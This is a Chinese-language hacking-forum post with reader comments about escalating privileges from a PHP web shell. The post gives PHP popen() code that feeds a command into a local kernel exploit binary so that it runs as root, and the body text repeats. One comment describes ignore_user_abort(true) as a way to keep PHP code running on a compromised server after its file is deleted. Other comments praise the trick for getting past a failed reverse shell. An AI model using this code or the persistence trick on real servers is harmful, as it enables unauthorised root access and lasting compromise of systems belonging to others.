PHP 非交互式 执行交互式命令
提权转发不出来
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了 看懂的人自然就懂了
代码
再补一张图
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了 看懂的人自然就懂了
代码
<?php
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
@fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
@pclose($fp);
?>再补一张图
关于作者
评论55次
原型: resource popen ( string $command , string $mode )说明: 能够和命令进行交互。之前介绍的方法只能简单地执行命令,却不能与命令交互。有时须向命令输入一些东西,如在增加xi统用户时,要调用su来把当前用户换到root用户,而su命令必须要在命令行上输入root的密码。这种情况下,用之前提到的方法显然是不行的。popen( )函数打开一个进程管道来执行给定的命令,返回一个文件句柄,可以对它读和写。返回值和fopen()函数一样,返回一个文件指针。除非使用的是单一的模式打开(读or写),否则必须使用pclose()函数关闭。该指针可以被fgets(),fgetss(),fwrite()调用。出错时,返回FALSE。<?phperror_reporting(E_ALL); /* Add redirection so we can get stderr. */$handle = popen('/path/to/executable 2>&1', 'r');echo "'$handle'; " . gettype($handle) . "\n";$read = fread($handle, 2096);echo $read;pclose($handle);?>php 一般都开启安全模式 7大执行命令函数禁用 配置的很变态 嗯嗯php 还有一个邪恶的函数ignore_user_abort(true); 允许驻留执行 执行完php文件以后就会后台执行 删掉原文件都也依然可以执行 重启服务端自然就没有了不过可以结合数据库 来重刷嘿嘿
这个够详细
这个表示没有看懂啊
懂起了,非常有用,前几天shell死活反弹不出来,用这个搞定了。
提权这块好弱,来学学,谢谢楼主
吊炸天!!!!
过来学xi了解下。
思路不错 666
好思路,学xi了
牛逼,为什么不早出来
学xi了 感谢
厉害 学xi了
ignore_user_abort(true) 够邪恶,还没用过
弱弱的问一句 直接访问php文件就可以执行了,看起来是这个意思?
学xi了,,,,,
这个不错 可以一试 谢谢楼主
学xi了~~~~~~~~
嗯,去试试
PHP 有交互式命令么?
漂亮~
尽管我一直没有测试成功。。但是思路还是不错的。